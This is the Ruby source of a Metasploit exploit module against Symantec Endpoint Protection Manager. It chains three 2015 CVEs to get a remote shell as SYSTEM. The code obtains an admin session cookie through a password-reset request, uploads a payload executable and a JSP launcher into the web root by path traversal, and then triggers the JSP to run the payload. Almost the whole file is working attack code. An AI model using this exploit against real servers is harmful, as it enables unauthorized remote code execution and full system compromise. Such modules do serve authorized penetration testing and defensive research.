140 lines
4.2 KiB
Ruby
140 lines
4.2 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::FileDropper
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
|
|
'Description' => %q{
|
|
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
|
|
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
|
|
include an authentication bypass, a directory traversal and a privilege escalation to
|
|
get privileged code execution.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Markus Wulftange', #discovery
|
|
'bperry' # metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
['CVE', '2015-1486'],
|
|
['CVE', '2015-1487'],
|
|
['CVE', '2015-1489'],
|
|
['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
|
|
],
|
|
'DefaultOptions' => {
|
|
'SSL' => true
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Automatic',
|
|
{
|
|
'Arch' => ARCH_X86,
|
|
'Payload' => {
|
|
'DisableNops' => true
|
|
}
|
|
}
|
|
],
|
|
],
|
|
'Privileged' => true,
|
|
'DisclosureDate' => 'Jul 31 2015',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(8443),
|
|
OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
|
|
], self.class)
|
|
end
|
|
|
|
def exploit
|
|
meterp = Rex::Text.rand_text_alpha(10)
|
|
jsp = Rex::Text.rand_text_alpha(10)
|
|
|
|
print_status("Getting cookie...")
|
|
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
|
|
'method' => 'POST',
|
|
'vars_post' => {
|
|
'ActionType' => 'ResetPassword',
|
|
'UserID' => 'admin',
|
|
'Domain' => ''
|
|
}
|
|
})
|
|
|
|
unless res && res.code == 200
|
|
fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
|
|
end
|
|
|
|
cookie = res.get_cookies
|
|
|
|
if cookie.nil? || cookie.empty?
|
|
fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
|
|
end
|
|
|
|
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
|
|
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
|
|
}
|
|
|
|
print_status("Uploading payload...")
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
|
|
'method' => 'POST',
|
|
'vars_get' => {
|
|
'ActionType' => 'BinaryFile',
|
|
'Action' => 'UploadPackage',
|
|
'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
|
|
'KnownHosts' => '.'
|
|
},
|
|
'data' => payload.encoded_exe,
|
|
'cookie' => cookie,
|
|
'ctype' => ''
|
|
})
|
|
|
|
unless res && res.code == 200
|
|
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
|
|
end
|
|
|
|
register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
|
|
|
|
print_status("Uploading JSP page to execute the payload...")
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
|
|
'method' => 'POST',
|
|
'vars_get' => {
|
|
'ActionType' => 'BinaryFile',
|
|
'Action' => 'UploadPackage',
|
|
'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
|
|
'KnownHosts' => '.'
|
|
},
|
|
'data' => exec,
|
|
'cookie' => cookie,
|
|
'ctype' => ''
|
|
})
|
|
|
|
unless res && res.code == 200
|
|
fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
|
|
end
|
|
|
|
register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
|
|
|
|
print_status("Executing payload. Manual cleanup will be required.")
|
|
send_request_cgi({
|
|
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
|
|
}, 5)
|
|
end
|
|
end
|